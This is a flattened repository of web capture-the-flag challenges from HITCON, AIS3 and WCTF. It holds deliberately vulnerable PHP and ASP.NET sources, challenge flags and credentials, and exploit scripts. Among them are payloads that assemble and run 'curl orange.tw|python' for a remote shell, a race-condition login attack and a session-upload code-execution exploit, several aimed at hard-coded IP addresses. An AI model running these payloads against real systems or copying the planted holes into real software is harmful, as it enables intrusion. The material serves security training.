├── README.md ├── ais3-final-2015 └── sqlpwn │ ├── config.php │ ├── exploit.py │ └── sqlpwn.php ├── hitcon-ctf-2014 ├── leenode │ ├── admin │ │ ├── .htaccess │ │ ├── .htpasswd │ │ └── a │ └── index.html ├── pushincat │ ├── config.php │ ├── do.php │ ├── flag.html │ ├── h2-1.4.178.jar │ ├── index.html │ ├── name.mv.db │ └── name.trace.db └── py4h4sher │ ├── md5fun.py │ └── secret_file.py ├── hitcon-ctf-2015 ├── babyfirst │ └── index.php ├── giraffe's-coffee │ ├── config.php │ ├── index.php │ └── index.tpl.html ├── lalala │ ├── lalala.php │ └── sol.php ├── nanana │ ├── Makefile │ ├── cgid.c │ ├── exploit.py │ ├── index.html │ ├── libcgid.so │ ├── nanana │ └── nanana.c └── use-after-flee │ └── index.php ├── hitcon-ctf-2016 ├── angry boy │ ├── Lottery.class │ ├── Lottery.java │ ├── decrypt.py │ ├── exploit.py │ └── servlet-api.jar ├── angry seam │ ├── .classpath │ ├── .project │ ├── .settings │ │ ├── .jsdtscope │ │ ├── org.eclipse.jdt.core.prefs │ │ ├── org.eclipse.wst.common.component │ │ ├── org.eclipse.wst.common.project.facet.core.xml │ │ ├── org.eclipse.wst.jsdt.ui.superType.container │ │ ├── org.eclipse.wst.jsdt.ui.superType.name │ │ └── org.jboss.ide.eclipse.as.core.prefs │ ├── .tern-project │ ├── WebContent │ │ ├── META-INF │ │ │ ├── MANIFEST.MF │ │ │ └── context.xml │ │ ├── WEB-INF │ │ │ ├── classes │ │ │ │ ├── META-INF │ │ │ │ │ └── persistence.xml │ │ │ │ ├── import.sql │ │ │ │ ├── log4j.xml │ │ │ │ ├── org │ │ │ │ │ └── jboss │ │ │ │ │ │ └── seam │ │ │ │ │ │ └── example │ │ │ │ │ │ └── jpa │ │ │ │ │ │ ├── AuthenticatorAction.class │ │ │ │ │ │ ├── FlagAction.class │ │ │ │ │ │ ├── MyCaptcha.class │ │ │ │ │ │ ├── ProfileAction.class │ │ │ │ │ │ ├── RegisterAction.class │ │ │ │ │ │ ├── ReportAction.class │ │ │ │ │ │ ├── Url.class │ │ │ │ │ │ ├── User.class │ │ │ │ │ │ └── Util.class │ │ │ │ ├── resource │ │ │ │ │ └── user.css │ │ │ │ └── seam.properties │ │ │ ├── components.xml │ │ │ ├── faces-config.xml │ │ │ ├── lib │ │ │ │ ├── antlr.jar │ │ │ │ ├── 
commons-beanutils.jar │ │ │ │ ├── commons-collections.jar │ │ │ │ ├── commons-digester.jar │ │ │ │ ├── commons-lang.jar │ │ │ │ ├── commons-logging.jar │ │ │ │ ├── concurrent.jar │ │ │ │ ├── dom4j.jar │ │ │ │ ├── hibernate-annotations.jar │ │ │ │ ├── hibernate-commons-annotations.jar │ │ │ │ ├── hibernate-core.jar │ │ │ │ ├── hibernate-entitymanager.jar │ │ │ │ ├── hibernate-validator.jar │ │ │ │ ├── hsqldb.jar │ │ │ │ ├── javassist.jar │ │ │ │ ├── jboss-common-core.jar │ │ │ │ ├── jboss-el.jar │ │ │ │ ├── jboss-seam-debug.jar │ │ │ │ ├── jboss-seam-ui.jar │ │ │ │ ├── jboss-seam.jar │ │ │ │ ├── jsf-api.jar │ │ │ │ ├── jsf-facelets.jar │ │ │ │ ├── jsf-impl.jar │ │ │ │ ├── jta.jar │ │ │ │ ├── log4j.jar │ │ │ │ ├── mysql-connector-java-5.1.14-bin.jar │ │ │ │ ├── ojdbc14.jar │ │ │ │ ├── persistence-api.jar │ │ │ │ ├── richfaces-api.jar │ │ │ │ ├── richfaces-impl.jar │ │ │ │ ├── richfaces-ui.jar │ │ │ │ ├── slf4j-api.jar │ │ │ │ ├── slf4j-log4j12.jar │ │ │ │ └── testng-5.8-jdk15.jar │ │ │ ├── pages.xml │ │ │ └── web.xml │ │ ├── css.xhtml │ │ ├── edit.xhtml │ │ ├── flag.xhtml │ │ ├── home.xhtml │ │ ├── img │ │ │ ├── bg.gif │ │ │ ├── btn.bg.gif │ │ │ ├── cal-next.png │ │ │ ├── cal-prev.png │ │ │ ├── cnt.bg.gif │ │ │ ├── dtpick.gif │ │ │ ├── hdr.ad.jpg │ │ │ ├── hdr.bar.jpg │ │ │ ├── hdr.bg.gif │ │ │ ├── hdr.title.gif │ │ │ ├── header_line.gif │ │ │ ├── input.bg.gif │ │ │ ├── sdb.bg.gif │ │ │ ├── spinner.gif │ │ │ └── th.bg.gif │ │ ├── index.html │ │ ├── main.xhtml │ │ ├── profile.xhtml │ │ ├── register.xhtml │ │ ├── report.xhtml │ │ └── template.xhtml │ ├── angryseam.war │ └── src │ │ ├── META-INF │ │ └── persistence.xml │ │ ├── import.sql │ │ ├── log4j.xml │ │ ├── org │ │ └── jboss │ │ │ └── seam │ │ │ └── example │ │ │ └── jpa │ │ │ ├── AuthenticatorAction.java │ │ │ ├── FlagAction.java │ │ │ ├── MyCaptcha.java │ │ │ ├── ProfileAction.java │ │ │ ├── RegisterAction.java │ │ │ ├── ReportAction.java │ │ │ ├── Url.java │ │ │ ├── User.java │ │ │ └── Util.java │ │ ├── 
resource │ │ └── user.css │ │ └── seam.properties ├── babytrick │ ├── config.php │ └── index.php ├── leaking │ ├── config.js │ └── main.js └── papapa │ ├── apache2 │ └── sites-enabled │ │ ├── 000-default.conf │ │ └── default-ssl.conf │ ├── index-secret.php │ └── index.php ├── hitcon-ctf-2017 ├── baby^h-master-php-2017 │ ├── avatar.gif │ ├── fork.py │ └── index.php ├── babyfirst-revenge-v2 │ ├── exploit.py │ └── index.php ├── babyfirst-revenge │ ├── exploit.py │ └── index.php ├── sql-so-hard │ ├── app.js │ └── exploit.py └── ssrfme │ └── index.php ├── hitcon-ctf-2018 ├── baby-cake │ ├── baby_cake.tgz │ └── exploit.phar ├── oh-my-raddit │ ├── exp.py │ └── src │ │ ├── app.py │ │ ├── db.db │ │ ├── requirements.txt │ │ ├── static │ │ ├── bootstrap.min.css │ │ └── hint.py │ │ └── templates │ │ └── index.html ├── one-line-php-challenge │ ├── exp_for_php.py │ └── src │ │ └── index.php └── why-so-serials │ └── src │ ├── Default.aspx │ └── web.config ├── hitcon-ctf-2019 ├── bounty-pl33z │ ├── bot │ │ ├── add_queue.py │ │ ├── bot.py │ │ └── config.json │ └── www │ │ ├── .admin.php │ │ ├── fd.php │ │ └── index.php ├── buggy-net │ └── Default.aspx ├── gogo-powersql │ ├── Dockerfile │ ├── FLAG │ ├── db.conf │ ├── index.html │ ├── query │ └── route.txt ├── luatic │ ├── config.php │ └── luatic.php └── virtual-public-network │ ├── DSSafe.pm │ └── diag.cgi ├── hitcon-ctf-2020 ├── Return-of-Use-After-Flee │ ├── index.php │ ├── install.txt │ └── libphp5.so ├── oShell │ ├── oShell-wrapper.py │ └── oShell │ │ ├── Dockerfile │ │ ├── build.sh │ │ ├── exp.txt │ │ ├── flag │ │ ├── oShell.py │ │ ├── readflag │ │ ├── readflag.c │ │ └── tcpdump └── oStyle │ ├── bot.py │ └── oStyle │ ├── Dockerfile │ ├── config.json │ ├── my_security.conf │ └── www │ ├── add_queue.py │ ├── bootstrap.min.css │ ├── index.php │ └── upload.php ├── hitcon-ctf-2021 ├── FBI-Warning │ ├── index.html │ └── src │ │ └── 1638537259302.jpg ├── Metamon-Verse │ ├── Dockerfile │ ├── Makefile │ ├── app │ │ ├── app.py │ │ ├── 
static │ │ │ ├── bg.jpg │ │ │ └── bootstrap.min.css │ │ └── templates │ │ │ └── index.html │ ├── files │ │ ├── entrypoint.sh │ │ ├── fake-flag │ │ ├── flag │ │ ├── readflag │ │ └── readflag.c │ ├── run.py │ └── static │ │ ├── hint.txt │ │ └── metamon-verse.tgz ├── One-Bit-Man │ ├── Dockerfile │ ├── Makefile │ ├── files │ │ ├── entrypoint.sh │ │ ├── fake-flag │ │ ├── flag │ │ ├── hack.php │ │ ├── htaccess │ │ ├── init.sql │ │ ├── readflag │ │ └── readflag.c │ ├── run.py │ ├── static │ │ └── one-bit-man.tgz │ └── wordpress.tgz ├── Vulpixelize │ ├── Dockerfile │ ├── Makefile │ ├── app │ │ ├── app.py │ │ ├── static │ │ │ ├── bg.jpg │ │ │ └── bootstrap.min.css │ │ └── templates │ │ │ └── index.html │ ├── files │ │ ├── entrypoint.sh │ │ ├── fake-secret │ │ ├── read_secret │ │ ├── read_secret.c │ │ └── secret │ ├── run.py │ └── static │ │ └── vulpixelize.tgz └── W3rmup-PHP │ └── index.php └── wctf-2016 └── BlackBox ├── apache2 ├── apache2.conf ├── conf-enabled │ ├── charset.conf │ ├── localized-error-pages.conf │ ├── other-vhosts-access-log.conf │ ├── security.conf │ └── serve-cgi-bin.conf ├── envvars ├── magic ├── mods-enabled │ ├── jk.conf │ ├── jk.load │ ├── php7.0.conf │ └── php7.0.load ├── ports.conf └── sites-enabled │ └── 000-default.conf ├── etc └── crontab ├── h2 ├── bin │ ├── h2-1.4.191.jar │ ├── h2-shell.sh │ └── h2.pid └── db │ ├── news.mv.db │ └── news.trace.db ├── login.war ├── tomcat8 ├── conf │ ├── Catalina │ │ └── localhost │ │ │ └── manager.xml │ ├── catalina.properties │ ├── context.xml │ ├── logging.properties │ ├── policy.d │ │ ├── 01system.policy │ │ ├── 02debian.policy │ │ ├── 03catalina.policy │ │ ├── 04webapps.policy │ │ └── 50local.policy │ ├── server.xml │ ├── tomcat-users.xml │ └── web.xml ├── lib │ └── commons-codec-1.10.jar └── webapps │ ├── ROOT │ └── META-INF │ │ └── context.xml │ ├── login │ ├── META-INF │ │ ├── MANIFEST.MF │ │ └── war-tracker │ └── index.jsp │ └── waf │ ├── META-INF │ ├── MANIFEST.MF │ └── war-tracker │ └── index.jsp ├── 
waf.war └── www ├── index.php ├── login.php ├── news.php ├── news └── index.php ├── show.php ├── static ├── bootstrap.min.css └── jquery-2.2.1.min.js ├── waf.php ├── waf └── index.php └── www_backup_for_poc_ctf_and_you_cant_guess_it_59cffc9547c828b5.tgz /ais3-final-2015/sqlpwn/config.php: -------------------------------------------------------------------------------- 1 | ' + str(i) 10 | data = {'name': name, 'pass': name} 11 | 12 | def reg(name): 13 | r = requests.post( 'http://1.2.3.4/sqlpwn.php?mode=register', 14 | headers=headers, 15 | data=data) 16 | def login(name): 17 | _h = dict(headers) 18 | _h['Cookie'] = 'PHPSESSID=%dphp' % randint(0,0xffffff) 19 | r = requests.post( 'http://1.2.3.4/sqlpwn.php?mode=login', 20 | headers=_h, 21 | data=data) 22 | 23 | if 'user locked' not in r.content and 'user not found' not in r.content : 24 | print _h 25 | exit() 26 | 27 | threading.Thread(target=login, args=(name, )).start() 28 | threading.Thread(target=reg, args=(name, )).start() 29 | -------------------------------------------------------------------------------- /hitcon-ctf-2014/leenode/admin/.htaccess: -------------------------------------------------------------------------------- 1 | AuthName "Restricted Area" 2 | AuthType Basic 3 | AuthUserFile /usr/local/apache2/htdocs/admin/.htpasswd 4 | AuthGroupFile /dev/null 5 | require valid-user 6 | -------------------------------------------------------------------------------- /hitcon-ctf-2014/leenode/admin/.htpasswd: -------------------------------------------------------------------------------- 1 | test:XK12M2l8DymXE 2 | 3 | -------------------------------------------------------------------------------- /hitcon-ctf-2014/leenode/admin/a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2014/leenode/admin/a 
-------------------------------------------------------------------------------- /hitcon-ctf-2014/leenode/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
5 |8 | Use your force to find the secret behind this website! 9 | 10 | If you are experienced in pentesting, you will solve it quickly :) 11 | -------------------------------------------------------------------------------- /hitcon-ctf-2017/baby^h-master-php-2017/avatar.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2017/baby^h-master-php-2017/avatar.gif -------------------------------------------------------------------------------- /hitcon-ctf-2017/baby^h-master-php-2017/fork.py: -------------------------------------------------------------------------------- 1 | # coding: UTF-8 2 | # Author: orange@chroot.org 3 | # 4 | 5 | import requests 6 | import socket 7 | import time 8 | from multiprocessing.dummy import Pool as ThreadPool 9 | try: 10 | requests.packages.urllib3.disable_warnings() 11 | except: 12 | pass 13 | 14 | def run(i): 15 | while 1: 16 | HOST = '13.115.31.205' 17 | PORT = 80 18 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | s.connect((HOST, PORT)) 20 | s.sendall('GET / HTTP/1.1\nHost: 54.238.212.199\nConnection: Keep-Alive\n\n') 21 | # s.close() 22 | print 'ok' 23 | time.sleep(0.5) 24 | 25 | i = 8 26 | pool = ThreadPool( i ) 27 | result = pool.map_async( run, range(i) ).get(0xffff) 28 | -------------------------------------------------------------------------------- /hitcon-ctf-2017/baby^h-master-php-2017/index.php: -------------------------------------------------------------------------------- 1 | avatar = $path; 18 | } 19 | } 20 | 21 | class Admin extends User { 22 | function __destruct(){ 23 | $random = bin2hex(openssl_random_pseudo_bytes(32)); 24 | eval("function my_function_$random() {" 25 | ." 
global \$FLAG; \$FLAG();" 26 | ."}"); 27 | $_GET["lucky"](); 28 | } 29 | } 30 | 31 | function check_session() { 32 | global $SECRET; 33 | $data = $_COOKIE["session-data"]; 34 | list($data, $hmac) = explode("-----", $data, 2); 35 | if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac)) 36 | die("Bye"); 37 | if ( !hash_equals(hash_hmac("sha1", $data, $SECRET), $hmac) ) 38 | die("Bye Bye"); 39 | 40 | $data = unserialize($data); 41 | if ( !isset($data->avatar) ) 42 | die("Bye Bye Bye"); 43 | return $data->avatar; 44 | } 45 | 46 | function upload($path) { 47 | $data = file_get_contents($_GET["url"] . "/avatar.gif"); 48 | if (substr($data, 0, 6) !== "GIF89a") 49 | die("Fuck off"); 50 | file_put_contents($path . "/avatar.gif", $data); 51 | die("Upload OK"); 52 | } 53 | 54 | function show($path) { 55 | if ( !file_exists($path . "/avatar.gif") ) 56 | $path = "/var/www/html"; 57 | header("Content-Type: image/gif"); 58 | die(file_get_contents($path . "/avatar.gif")); 59 | } 60 | 61 | $mode = $_GET["m"]; 62 | if ($mode == "upload") 63 | upload(check_session()); 64 | else if ($mode == "show") 65 | show(check_session()); 66 | else 67 | highlight_file(__FILE__); 68 | -------------------------------------------------------------------------------- /hitcon-ctf-2017/babyfirst-revenge-v2/exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from time import sleep 3 | from urllib import quote 4 | 5 | payload = [ 6 | # generate "g> ht- sl" to file "v" 7 | '>dir', 8 | '>sl', 9 | '>g\>', 10 | '>ht-', 11 | '*>v', 12 | 13 | # reverse file "v" to file "x", content "ls -th >g" 14 | '>rev', 15 | '*v>x', 16 | 17 | # generate "curl orange.tw|python;" 18 | '>\;\\', 19 | '>on\\', 20 | '>th\\', 21 | '>py\\', 22 | '>\|\\', 23 | '>tw\\', 24 | '>e.\\', 25 | '>ng\\', 26 | '>ra\\', 27 | '>o\\', 28 | '>\ \\', 29 | '>rl\\', 30 | '>cu\\', 31 | 32 | # got shell 33 | 'sh x', 34 | 'sh g', 35 | ] 36 | 37 | 38 | r = 
requests.get('http://52.197.41.31/?reset=1') 39 | for i in payload: 40 | assert len(i) <= 4 41 | r = requests.get('http://52.197.41.31/?cmd=' + quote(i) ) 42 | print i 43 | sleep(0.1) 44 | 45 | -------------------------------------------------------------------------------- /hitcon-ctf-2017/babyfirst-revenge-v2/index.php: -------------------------------------------------------------------------------- 1 | g` file 7 | '>ls\\', 8 | 'ls>_', 9 | '>\ \\', 10 | '>-t\\', 11 | '>\>g', 12 | 'ls>>_', 13 | 14 | # generate `curl orange.tw|python` 15 | '>on', 16 | '>th\\', 17 | '>py\\', 18 | '>\|\\', 19 | '>tw\\', 20 | '>e.\\', 21 | '>ng\\', 22 | '>ra\\', 23 | '>o\\', 24 | '>\ \\', 25 | '>rl\\', 26 | '>cu\\', 27 | 28 | # exec 29 | 'sh _', 30 | 'sh g', 31 | ] 32 | 33 | 34 | 35 | r = requests.get('http://52.199.204.34/?reset=1') 36 | for i in payload: 37 | assert len(i) <= 5 38 | r = requests.get('http://52.199.204.34/?cmd=' + quote(i) ) 39 | print i 40 | sleep(0.2) 41 | 42 | -------------------------------------------------------------------------------- /hitcon-ctf-2017/babyfirst-revenge/index.php: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | 6 | 7 |8 | On my Raddit 9 | 10 | 11 | 12 | 17 | 30 | 31 | 32 |33 |68 | 69 | 70 | -------------------------------------------------------------------------------- /hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import string 3 | import requests 4 | from base64 import b64encode 5 | from random import sample, randint 6 | from multiprocessing.dummy import Pool as ThreadPool 7 | 8 | 9 | 10 | HOST = 'http://54.250.246.238/' 11 | sess_name = 'iamorange' 12 | 13 | headers = { 14 | 'Connection': 'close', 15 | 'Cookie': 'PHPSESSID=' + sess_name 16 | } 17 | 18 | payload = '@' 19 | 20 | 21 | while 1: 22 | junk = ''.join(sample(string.ascii_letters, randint(8, 16))) 23 | x = b64encode(payload + 
junk) 24 | xx = b64encode(b64encode(payload + junk)) 25 | xxx = b64encode(b64encode(b64encode(payload + junk))) 26 | if '=' not in x and '=' not in xx and '=' not in xxx: 27 | payload = xxx 28 | print payload 29 | break 30 | 31 | def runner1(i): 32 | data = { 33 | 'PHP_SESSION_UPLOAD_PROGRESS': 'ZZ' + payload + 'Z' 34 | } 35 | while 1: 36 | fp = open('/etc/passwd', 'rb') 37 | r = requests.post(HOST, files={'f': fp}, data=data, headers=headers) 38 | fp.close() 39 | 40 | def runner2(i): 41 | filename = '/var/lib/php/sessions/sess_' + sess_name 42 | filename = 'php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s' % filename 43 | # print filename 44 | while 1: 45 | url = '%s?orange=%s' % (HOST, filename) 46 | r = requests.get(url, headers=headers) 47 | c = r.content 48 | if c and 'orange' not in c: 49 | print [c] 50 | 51 | 52 | if sys.argv[1] == '1': 53 | runner = runner1 54 | else: 55 | runner = runner2 56 | 57 | pool = ThreadPool(32) 58 | result = pool.map_async( runner, range(32) ).get(0xffff) 59 | 60 | -------------------------------------------------------------------------------- /hitcon-ctf-2018/one-line-php-challenge/src/index.php: -------------------------------------------------------------------------------- 1 | 2 | 34 | 35 | 36 | 37 | 38 | 39 | 40 |34 |67 |On my Raddit
35 |Flag is hitcon{ENCRYPTION_KEY}, and here is a hint for you :P
36 |P.S. If you fail in submitting the flag and want to argue with author, read the source first!
37 |
38 |39 | Totoal: ${len(records)} 40 | 45 |
46 |47 | 48 |
66 |49 | 53 | 54 | 55 | $for r in records: 56 |Ups 50 |Title 51 |File 52 |57 | 64 | 65 |$r['ups'] 58 |$r['t'] 59 | $if r['file'] : 60 |down 61 | $else: 62 |63 | Why so Serials? 41 | 42 | 43 |44 | 64 |65 | 66 | 67 | -------------------------------------------------------------------------------- /hitcon-ctf-2018/why-so-serials/src/web.config: -------------------------------------------------------------------------------- 1 | 2 |3 | 8 | -------------------------------------------------------------------------------- /hitcon-ctf-2019/bounty-pl33z/bot/add_queue.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # coding: utf-8 3 | 4 | import sys, json 5 | from rq import Queue 6 | from redis import Redis 7 | from base64 import b64decode 8 | 9 | import bot 10 | 11 | try: 12 | with open('/bot/config.json', 'r') as fp: 13 | REDIS_PASSWORD = json.load(fp)['password'] 14 | q = Queue(connection=Redis(password=REDIS_PASSWORD)) 15 | q.enqueue(bot.add, b64decode(sys.argv[1])) 16 | print 'Done! 
Please waiting for the admin :)' 17 | except Exception as e: 18 | print 'Error[%s] Please contact admin' % e.message 19 | -------------------------------------------------------------------------------- /hitcon-ctf-2019/bounty-pl33z/bot/bot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # coding: utf-8 3 | 4 | from selenium import webdriver 5 | import time, sys, json, selenium 6 | 7 | # cd /bot/ && rq worker -v -u redis://:orangenogg@127.0.0.1:6379/ 8 | 9 | def add(url): 10 | chrome_options = webdriver.ChromeOptions() 11 | chrome_options.add_argument('--headless') 12 | chrome_options.add_argument('--disable-gpu') 13 | chrome_options.add_argument('--disable-dev-shm-usage') 14 | # chrome_options.add_argument('--no-sandbox') 15 | 16 | with open('config.json', 'r') as fp: 17 | ADMIN_URL = json.load(fp)['admin_url'] 18 | 19 | client = webdriver.Chrome(chrome_options=chrome_options) 20 | client.set_page_load_timeout(5) 21 | client.set_script_timeout(5) 22 | client.get(ADMIN_URL) 23 | client.get(url) 24 | i = 0 25 | while 1: 26 | try: 27 | client.switch_to_alert().accept() 28 | i += 1 29 | if i > 1000: 30 | break 31 | except selenium.common.exceptions.NoAlertPresentException: 32 | break 33 | 34 | time.sleep(2) 35 | client.quit() 36 | 37 | if __name__ == '__main__': 38 | add(sys.argv[1]) 39 | -------------------------------------------------------------------------------- /hitcon-ctf-2019/bounty-pl33z/bot/config.json: -------------------------------------------------------------------------------- 1 | { 2 | "password": "orangenogg", 3 | "server_ip": "3.114.5.202", 4 | "base": "http://3.114.5.202/", 5 | "admin_url": "http://3.114.5.202/.admin.php", 6 | "flag": "hitcon{/FD 1s 0ur g0d <(_ _)>}" 7 | } 8 | -------------------------------------------------------------------------------- /hitcon-ctf-2019/bounty-pl33z/www/.admin.php: -------------------------------------------------------------------------------- 1 | 
server_ip) { 5 | setcookie("flag", $config->flag); 6 | } -------------------------------------------------------------------------------- /hitcon-ctf-2019/bounty-pl33z/www/fd.php: -------------------------------------------------------------------------------- 1 | 1) $q = str_replace("'", "", $q); 6 | if( substr_count($q, '"') > 1) $q = str_replace('"', "", $q); 7 | $host = $q . ".orange.ctf"; 8 | 9 | ?> 10 | 11 | 12 | 13 | 14 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /hitcon-ctf-2019/bounty-pl33z/www/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 17 | 18 | 19 |4 | 7 |5 | 6 | 20 |74 | 75 | 76 | -------------------------------------------------------------------------------- /hitcon-ctf-2019/buggy-net/Default.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | 3 | 4 | 5 | 6 | 7 | 8 | 19 | 20 | 21 |
21 |
22 |23 |25 | 26 |Report bugs to admin?
24 |
27 |
28 |29 |43 | 44 |30 | 41 |42 |
45 |
46 |47 |73 |base)) != $config->base) { 54 | $msg = "Wrong URL :("; 55 | } else { 56 | $key = sprintf("lock_%s", $_SERVER['REMOTE_ADDR']); 57 | $redis = new Redis(); 58 | $redis->connect('127.0.0.1', 6379); 59 | $redis->auth($config->password); 60 | 61 | if($redis->get($key) != null) { 62 | $msg = "Too fast :("; 63 | } else { 64 | $redis->set($key, "ok", 10); 65 | $msg = @exec("python /bot/add_queue.py " . base64_encode($url)); 66 | } 67 | $redis->close(); 68 | } 69 | echo $msg 70 | 71 | ?>
72 |22 |73 | 74 | 75 | -------------------------------------------------------------------------------- /hitcon-ctf-2019/gogo-powersql/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | MAINTAINER
23 |
24 |25 |27 | 28 |Buggy .Net
26 |29 | Here is the source for you: Default.txt 30 |31 | 32 |
33 |34 |48 | 49 |35 | 46 |47 |
50 |
51 |52 |72 |<% 53 | 54 | bool isBad = false; 55 | try { 56 | if ( Request.Form["filename"] != null ) { 57 | isBad = Request.Form["filename"].Contains("..") == true; 58 | } 59 | } catch (Exception ex) { 60 | 61 | } 62 | 63 | try { 64 | if (!isBad) { 65 | Response.Write(System.IO.File.ReadAllText(@"C:\inetpub\wwwroot\" + Request.Form["filename"])); 66 | } 67 | } catch (Exception ex) { 68 | 69 | } 70 | %>
71 |orange@chroot.org 3 | 4 | EXPOSE 80/tcp 5 | 6 | WORKDIR /root/ 7 | RUN apt-get update 8 | RUN apt install -y git make gcc libmysqlclient20 9 | RUN git clone https://github.com/embedthis/goahead.git 10 | 11 | WORKDIR /root/goahead/ 12 | RUN git checkout v4.0.0 13 | RUN sed -i 's/DME_DEBUG=1/DME_DEBUG=0/' projects/goahead-linux-static.mk 14 | RUN make PROFILE=static ME_COM_SSL=0 ME_GOAHEAD_SSL=0 ME_COM_MBEDTLS=0 DEBUG=0 15 | RUN make -- DEBUG=0 ME_COM_MBEDTLS=0 ME_GOAHEAD_SSL=0 ME_COM_SSL=0 PROFILE=static install 16 | 17 | WORKDIR /etc/goahead 18 | RUN mkdir web/ 19 | RUN mkdir cgi-bin/ 20 | RUN sed -i 's/CGI/\x0\x0\x0/g' /usr/local/bin/goahead 21 | COPY db.conf . 22 | COPY route.txt . 23 | COPY index.html web/ 24 | COPY query cgi-bin/ 25 | 26 | COPY FLAG / 27 | CMD ["goahead", "-v"] -------------------------------------------------------------------------------- /hitcon-ctf-2019/gogo-powersql/FLAG: -------------------------------------------------------------------------------- 1 | hitcon{Env1r0nm3nt 1nj3ct10n r0cks!!!} 2 | -------------------------------------------------------------------------------- /hitcon-ctf-2019/gogo-powersql/db.conf: -------------------------------------------------------------------------------- 1 | dbhost=127.0.0.1 2 | dbuser=go 3 | dbpass=go 4 | dbname=go 5 | -------------------------------------------------------------------------------- /hitcon-ctf-2019/gogo-powersql/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 17 | 45 | 46 | 47 | 48 |78 | 79 | -------------------------------------------------------------------------------- /hitcon-ctf-2019/gogo-powersql/query: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2019/gogo-powersql/query -------------------------------------------------------------------------------- 
/hitcon-ctf-2019/gogo-powersql/route.txt: -------------------------------------------------------------------------------- 1 | # 2 | # route.txt - Route and authorization configuration 3 | # 4 | # Schema 5 | # route uri=URI protocol=PROTOCOL methods=METHODS handler=HANDLER redirect=STATUS@URI \ 6 | # extensions=EXTENSIONS abilities=ABILITIES 7 | # 8 | # Routes may require authentication and that users possess certain abilities. 9 | # The abilities, extensions, methods and redirect keywords use comma separated tokens to express a set of 10 | # required options, or use "|" separated tokens for a set of alternative options. This implements AND/OR. 11 | # The protocol keyword may be set to http or https. The redirect status may be "*" to match all HTTP status codes. 12 | # Multiple redirect fields are permissible. 13 | # 14 | # Examples: 15 | # 16 | # Universally redirect http to https for secure communications 17 | # route uri=/ protocol=http redirect=*@https handler=redirect 18 | # 19 | # Form based login pattern. 
20 | # route uri=/pub/ 21 | # route uri=/action/login methods=POST handler=action redirect=200@/ redirect=401@/pub/login.html 22 | # route uri=/action/logout methods=POST handler=action redirect=200@/pub/login.html 23 | # route uri=/ auth=form handler=continue redirect=401@/pub/login.html 24 | # 25 | # Sample basic or digest authentication for user "joshua" 26 | # route uri=/auth/basic/ auth=basic abilities=manage 27 | # route uri=/auth/digest/ auth=digest abilities=manage 28 | # 29 | # Enable the PUT or DELETE methods (only) for the BIT_GOAHEAD_PUT_DIR directory 30 | # route uri=/put/ methods=PUT|DELETE 31 | # 32 | # Standard routes 33 | # 34 | route uri=/cgi-bin handler=cgi 35 | # route uri=/action handler=action 36 | # route uri=/ extensions=jst handler=jst 37 | # route uri=/ methods=OPTIONS|TRACE handler=options 38 | 39 | # For legacy GoAhead applications using /goform 40 | # route uri=/goform handler=action 41 | 42 | # 43 | # Catch-all route without authentication for all other URIs (in this deployment only /cgi-bin above has a dedicated handler; every other route line is commented out) 44 | # 45 | route uri=/ 46 | 47 | -------------------------------------------------------------------------------- /hitcon-ctf-2019/luatic/config.php: -------------------------------------------------------------------------------- 1 | <"); 7 | $TEST_KEY = bin2hex(random_bytes(32)); 8 | $TEST_VALUE = bin2hex(random_bytes(32)); 9 | 10 | function check_team_redis_status($token) { 11 | $status = exec("sudo /redis/cmd.py " . escapeshellarg($token) . " status"); 12 | return trim($status); 13 | } 14 | 15 | function get_team_redis_port($token) { 16 | $status = exec("sudo /redis/cmd.py " . escapeshellarg($token) . 
" port"); 17 | return (int)$status; 18 | } 19 | -------------------------------------------------------------------------------- /hitcon-ctf-2019/luatic/luatic.php: -------------------------------------------------------------------------------- 1 | $v) { 6 | if( strlen($k) > 0 && preg_match('/^(FLAG|MY_|TEST_|GLOBALS)/i',$k) ) 7 | exit('Shame on you'); 8 | } 9 | 10 | foreach(Array('_GET','_POST') as $request) { 11 | foreach($$request as $k => $v) ${$k} = str_replace(str_split("[]{}=.'\""), "", $v); 12 | } 13 | 14 | if (strlen($token) == 0) highlight_file(__FILE__) and exit(); 15 | if (!preg_match('/^[a-f0-9-]{36}$/', $token)) die('Shame on you'); 16 | 17 | $guess = (int)$guess; 18 | if ($guess == 0) die('Shame on you'); 19 | 20 | // Check team token 21 | $status = check_team_redis_status($token); 22 | if ($status == "Invalid token") die('Invalid token'); 23 | if (strlen($status) == 0 || $status == 'Stopped') die('Start Redis first'); 24 | 25 | // Get team redis port 26 | $port = get_team_redis_port($token); 27 | if ((int)$port < 1024) die('Try again'); 28 | 29 | // Connect, we rename insecure commands 30 | // rename-command CONFIG "" 31 | // rename-command SCRIPT "" 32 | // rename-command MODULE "" 33 | // rename-command SLAVEOF "" 34 | // rename-command REPLICAOF "" 35 | // rename-command SET $MY_SET_COMMAND 36 | $redis = new Redis(); 37 | $redis->connect("127.0.0.1", $port); 38 | if (!$redis->auth($token)) die('Auth fail'); 39 | 40 | // Check availability 41 | $redis->rawCommand($MY_SET_COMMAND, $TEST_KEY, $TEST_VALUE); 42 | if ($redis->get($TEST_KEY) !== $TEST_VALUE) die('Something Wrong?'); 43 | 44 | // Lottery! 45 | $LUA_LOTTERY = 